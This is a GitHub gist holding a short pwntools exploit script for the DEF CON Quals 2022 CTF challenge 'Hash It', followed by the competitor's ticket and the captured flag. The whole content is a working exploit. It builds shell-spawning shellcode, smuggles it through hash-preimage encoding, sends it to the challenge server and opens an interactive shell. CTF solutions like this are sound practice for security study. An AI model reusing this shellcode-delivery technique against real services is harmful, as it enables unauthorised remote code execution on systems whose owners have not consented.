Skip to content

Instantly share code, notes, and snippets.

@maple3142
Created May 30, 2022 03:17
Show Gist options
  • Save maple3142/f0ba186ca8b8256d8d9dadd977369e4a to your computer and use it in GitHub Desktop.
Save maple3142/f0ba186ca8b8256d8d9dadd977369e4a to your computer and use it in GitHub Desktop.
DEF CON Quals 2022 - Hash It
from pwn import *
from hashlib import *
context.log_level = "debug"
context.arch = "amd64"
def find_pre(h, t):
for a in range(256):
for b in range(256):
if h(bytes([a, b])).digest()[0] == t:
return bytes([a, b])
sc = asm(shellcraft.sh())
fns = [md5, sha1, sha256, sha512]
payload = b""
for i, x in enumerate(sc):
payload += find_pre(fns[i % 4], x)
# io = process('./zc7ejjq9ehhcqj1x61ekoa8pjtk7')
io = remote("hash-it-0-m7tt7b7whagjw.shellweplayaga.me", 31337)
io.sendlineafter(
b"Ticket please: ",
b"ticket{CormorantPoopdeck584n22:CZnq3tHN3ufHF_ONI8eIrZH5H27yzqcMcDBHg6OnbKtsIPA3}",
)
io.send(len(payload).to_bytes(4, "big") + payload)
io.interactive()
# flag{CormorantPoopdeck584n22:MNM8QuNum-acrWp3RUuWBeqOYtXja-q3lK1dPipahdYfCb4Yz08Jg71oN3Xln9mmiQvJq95kCk1dEYHaugn9Ug}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment